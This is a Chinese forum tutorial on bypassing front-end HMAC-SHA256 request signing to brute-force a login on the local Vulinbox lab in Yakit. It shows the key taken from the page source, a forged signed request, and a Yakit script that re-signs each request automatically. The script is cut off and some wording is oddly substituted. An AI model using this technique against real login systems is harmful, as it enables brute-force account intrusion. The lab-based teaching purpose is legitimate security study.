ToB企服应用市场:ToB评测及商务社交产业平台

标题: 渗透测试-前端验签绕过之SHA256 [打印本页]
作者: 刘俊凯    时间: 2024-12-14 09:57
标题: 渗透测试-前端验签绕过之SHA256
本文是高级前端加解密与验签实战的第1篇文章,本系列文章实验靶场为Yakit里自带的Vulinbox靶场,本文讲述的是绕过SHA256签名来爆破登录。
绕过


通过查看源代码可以看到key为
  1. 1234123412341234
复制代码

通过查看源代码可以看到是通过SHA256来举行签名的,他把哀求体的username和password字段提取,然后举行加密。
  1. username=admin&password=admin123
复制代码

利用Cyberchief加密,最终得到加密值为:fc4b936199576dd7671db23b71100b739026ca9dcb3ae78660c4ba3445d0654d

可以看到本身计算和前端计算的同等:

修改暗码,重新构造签名:
  1. username=admin&password=666666
  2. =>
  3. 26976ad249c29595c3e9e368d9c3bc772b5a27291515caddd023d69421b7ffee
复制代码

发送哀求,可以看到验签成功,暗码正确登岸成功,自此签名绕过成功。
  1. POST /crypto/sign/hmac/sha256/verify HTTP/1.1
  2. Host: 127.0.0.1:8787
  3. Content-Type: application/json
  5. {
  6.   "signature": "26976ad249c29595c3e9e368d9c3bc772b5a27291515caddd023d69421b7ffee",
  7.   "key": "31323334313233343132333431323334",
  8.   "username": "admin",
  9.   "password": "666666"
  10. }
复制代码

热加载

这是我写的热加载代码,通过beforeRequest挟制哀求包,利用encryptData函数举行加密,最终实现热加载主动签名功能。
[code]encryptData = (packet) => {    body = poc.GetHTTPPacketBody(packet)    params = json.loads(body)    //获取账号和暗码    name = params.username    pass  = params.password    key = "31323334313233343132333431323334"    //十六进制密钥    //HmacSha256加密    signText = f`username=${name}&password=${pass}`    sign = codec.EncodeToHex(codec.HmacSha256(f`${codec.DecodeHex(key)~}`, signText))    //构造哀求体    result = f`{"username":"${name}","password":"${pass}","signature":"${sign}","key":"${key}"}`    return string(poc.ReplaceBody(packet, result, false))}//发送到服务端修改数据包// beforeRequest = func(req){//     return encryptData(req)// }//调试用packet =



欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4